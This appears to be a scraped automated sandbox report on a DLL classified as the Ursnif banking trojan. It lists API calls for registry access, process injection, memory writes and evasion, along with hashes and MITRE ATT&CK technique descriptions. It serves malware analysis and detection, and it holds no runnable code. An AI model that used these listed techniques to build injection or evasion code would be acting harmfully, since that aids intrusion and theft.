RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000018), ref: 00CAE3CF
RegQueryValueExA.KERNELBASE ref: 00CAE453

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 83968749edda24f626379064a89cfc3b23ab5636458cb9f588d0a570fe456a1c
Instruction ID: c3f99455f6649543e845cafab719e54b1f3c4bdc68969582de839d1730a6e97b
Opcode Fuzzy Hash: 83968749edda24f626379064a89cfc3b23ab5636458cb9f588d0a570fe456a1c
Instruction Fuzzy Hash: 6331C33061CB098FDB48EF18D8C9666B7E1FBA8305F11456EE849C3252DF74D9418B86

Uniqueness

Uniqueness Score: -1.00%

Function 00C9AB30, Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE ref: 00C9AB6E
RegCloseKey.KERNELBASE ref: 00C9ABDB

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 03166a78be183e977985df033c28aa13ae32554fde92a58bcb50ccb147f110fa
Instruction ID: 7e9cafa66a72cb6149a4737bad1fadd114ed8efbac04558ca7ddcb399d28ec34
Opcode Fuzzy Hash: 03166a78be183e977985df033c28aa13ae32554fde92a58bcb50ccb147f110fa
Instruction Fuzzy Hash: 11213174618A088FE754EF6CE84D62577E1FB98311F25456EE849C3261EF34D942CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00C96AC8, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32 ref: 00C96AEB
RegOpenKeyA.ADVAPI32 ref: 00C96AF8

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 76d4f1cca335f6e8cacf5840b4c337571957bcb698ca4321bfc5a91146e5a89e
Instruction ID: 1d51558f152d33f4e08bb17bb91e89eb0aa86ef478e1b8f6da35aaf7c369bdfe
Opcode Fuzzy Hash: 76d4f1cca335f6e8cacf5840b4c337571957bcb698ca4321bfc5a91146e5a89e
Instruction Fuzzy Hash: D1015230618A158FDB54EB5CD48CA2ABBE1FBEC351F14042EE84ED33A4EAB5C9458742

Uniqueness

Uniqueness Score: -1.00%

Function 00C95FA8, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00C95FD8
QueueUserAPC.KERNELBASE(?,?,?,?,?,?,?,?,0000007E,00000002,?,00CA7EF9), ref: 00C95FEF

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: CreateQueueThreadUser
String ID:
API String ID: 3600083758-0
Opcode ID: d01682cf42639fbbe8642a4b7d5119734023c297f00902dea5ded6f64ad3d452
Instruction ID: da69a21ab74927070d71dc2652807766545f050cb999a6961764a17eb2266dab
Opcode Fuzzy Hash: d01682cf42639fbbe8642a4b7d5119734023c297f00902dea5ded6f64ad3d452
Instruction Fuzzy Hash: DE015230718A058FAB64EF2C989D72977E2E7A8311724416AE80EC3370DA38DD468782

Uniqueness

Uniqueness Score: -1.00%

Function 00C94220, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00C9436B

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3e8b02ae905dd7ccfbf6718a7b06896ab50594543dc0eb2b970d6a73a80e7dee
Instruction ID: 5f86f07ab75695e4400b2c6c2f2e38c1cb53d2ba1d3647db5350c58a6967a026
Opcode Fuzzy Hash: 3e8b02ae905dd7ccfbf6718a7b06896ab50594543dc0eb2b970d6a73a80e7dee
Instruction Fuzzy Hash: 6D617730619F059FDB58EF28D889A65B7E0FB68301B60456EE84AC3661DF34E942CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00CB2E28, Relevance: 1.6, APIs: 1, Instructions: 107processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 00CB2ECC

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0d42eb0a31083845fd07ee8a1fa063d1086a003a97f1ca9bd265e6748c09d99c
Instruction ID: e1e48cae9d86977d60bf7d4f7f4120e84679b327e813f9d8b364367babb2632c
Opcode Fuzzy Hash: 0d42eb0a31083845fd07ee8a1fa063d1086a003a97f1ca9bd265e6748c09d99c
Instruction Fuzzy Hash: 2031217060CB484FDB54EF1D9885A6577E1FB98311F01466EE88DC3261DB70ED45CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00C9C158, Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32(?,?,?,?,?,00000004,00CA8231), ref: 00C9C235

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a9eabf409f579c6dff7df862555673a3f53458b76a2fb4a6403df468c659ed60
Instruction ID: b1a39c7a95f1f3650a3a7e9ea729765b5e65b9f0755c899c5f5568f400a782e6
Opcode Fuzzy Hash: a9eabf409f579c6dff7df862555673a3f53458b76a2fb4a6403df468c659ed60
Instruction Fuzzy Hash: 203171303187098BEF69EF79ECD9A2A73E2EB98300765552DA41BC3261DF38D9439741

Uniqueness

Uniqueness Score: -1.00%

Function 00CB9008, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 00CB90AA

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: 8102e3836a59dfdaad8702ed9d9cff585a58132ee9335c9a234ad988e76f58d1
Instruction ID: e11da2d818cb7ce44197607b06a54ab87bab4b270075b13d60488d56717dfb21
Opcode Fuzzy Hash: 8102e3836a59dfdaad8702ed9d9cff585a58132ee9335c9a234ad988e76f58d1
Instruction Fuzzy Hash: 4321C730708A0C4FEB98FF68A88967A77E1F799300F10442DE65BC3261DE34DD928782

Uniqueness

Uniqueness Score: -1.00%

Function 00C960B4, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00C960E7

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 51f3b436d0598b9656f965d21ff4ca27b1dbee94aab4cda31ae89bfefbe89f9f
Instruction ID: 75dbe7858abb568f0809bc7e416ab72db747e52ed2398e5c37cfc2cc1936288d
Opcode Fuzzy Hash: 51f3b436d0598b9656f965d21ff4ca27b1dbee94aab4cda31ae89bfefbe89f9f
Instruction Fuzzy Hash: AA11893160C7098F5F14EF69E845469B7E5EB98311710463DEC8FC3396EA74ED858782

Uniqueness

Uniqueness Score: -1.00%

Function 00CB5ECC, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 00CB5F78

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 229a954dea2fe6521409e99706229684785601aed22ae8cfbd191ace203f9b3b
Instruction ID: 00cb39341130bf2c0b6756cf96243a89d48906c9bb51735bd96ce19c5e412c25
Opcode Fuzzy Hash: 229a954dea2fe6521409e99706229684785601aed22ae8cfbd191ace203f9b3b
Instruction Fuzzy Hash: C9213031618F0A8FEB55EFACD844B6677E1FBA8301F04452EA51AC3264DF78D940CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00CB5F94, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 00CA1E6C: NtWriteVirtualMemory.NTDLL ref: 00CA1E8B

VirtualProtectEx.KERNELBASE ref: 00CB5FE8

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: Virtual$MemoryProtectWrite
String ID:
API String ID: 1789425917-0
Opcode ID: 9e3433c31fb69982b46df9dfa57ec71fa946816c29ab3b484e24e40fb431d072
Instruction ID: 68e0f7ebf905f9abb9600c58d976ff2e9d788fa0e01f4c5ec3470bbeafe5c221
Opcode Fuzzy Hash: 9e3433c31fb69982b46df9dfa57ec71fa946816c29ab3b484e24e40fb431d072
Instruction Fuzzy Hash: 6C017C70A18B088FCB48EF98A0C9525B7E0EB9C310F4445AEE80DC7286DB70DD44CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00CA9B5C, Relevance: 1.5, APIs: 1, Instructions: 242stringCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32 ref: 00CA9C8E

Memory Dump Source

Source File: 00000026.00000002.559502349.0000000000C91000.00000020.00000001.sdmp, Offset: 00C91000, based on PE: false

Similarity

API ID: lstrcmp
String ID:
API String ID: 1534048567-0
Opcode ID: 6b1e2ffc957bcd1a924743e860407443d223dbd2a62396dc446200e4d4ffa347
Instruction ID: 7dba64654393219548174ccf75e893e8e263681b2fa1cce81f65c24764f5b9ff
Opcode Fuzzy Hash: 6b1e2ffc957bcd1a924743e860407443d223dbd2a62396dc446200e4d4ffa347
Instruction Fuzzy Hash: 95718270A1CB498FC768DF18C486576B7E1FBD9718F14462EE49AC3251DB30E986CB82

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report mal.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre